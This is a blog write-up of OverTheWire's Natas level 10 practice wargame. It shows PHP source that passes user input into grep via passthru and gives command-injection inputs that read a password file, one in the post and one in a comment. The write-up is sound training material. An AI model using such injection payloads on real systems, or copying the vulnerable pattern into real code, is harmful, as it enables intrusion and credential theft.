Monday, October 29, 2012

OvertheWire - Natas Wargame Level 10 Writeup

Level 10

Using the credentials obtained in the previous writeup, we can log in to Level 10, where we are presented with the following:


It appears as though the only difference between this challenge and Level 9 is that certain characters are filtered. Let's see the source to figure out which characters are affected:

 <html>  
 <head><link rel="stylesheet" type="text/css" href="http://www.overthewire.org/wargames/natas/level.css"></head>  
 <body>  
 <h1>natas10</h1>  
 <div id="content">  
 For security reasons, we now filter on certain characters<br/><br/>  
 <form>  
 Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>  
 </form>  
 Output:  
 <pre>  
 <?  
 $key = "";  
 if(array_key_exists("needle", $_REQUEST)) {  
   $key = $_REQUEST["needle"];  
 }  
 if($key != "") {  
   if(preg_match('/[;|&]/',$key)) {  
     print "Input contains an illegal character!";  
   } else {  
     passthru("grep -i $key dictionary.txt");  
   }  
 }  
 ?>  
 </pre>  
 <div id="viewsource"><a href="index-source.html">View sourcecode</a></div>  
 </div>  
 </body>  
 </html>  

We can see the preg_match function in use to filter out the characters ';' and '&'. Therefore, we won't be able to terminate the command like we did in the previous writeup. However, what if we could utilize the grep command to output the contents of a particular file using a wildcard keyword, and specifying the password file of the natas11 user?

We can do so with the following command:

.* /etc/natas_webpass/natas11 #

This command searches for any character in the file and comments out the reference to dictionary.txt. Let's see what happens:


Awesome. We can see that our command completed successfully, and we can see the contents of the password file at the bottom (in addition to the contents of what appears to be the .htaccess file for natas10). We can use this password to log in to the next level. More writeups to come.

- Jordan

4 comments:

  1. This comment has been removed by the author.

    ReplyDelete
  2. I solved this one by sending %0Acat%20/etc/natas_webpass/natas11 as the needle param.
    cheers,

    ReplyDelete
  3. Could you explain what the function of the '.' is in the command?
    Why does simply doing '* /etc/natas_webpass/natas11 #' display the website's source instead of search results?

    ReplyDelete
    Replies
    1. I believe .* is the regex evaluated by grep. it means any character (the dot) 0 or more times (the star)

      Delete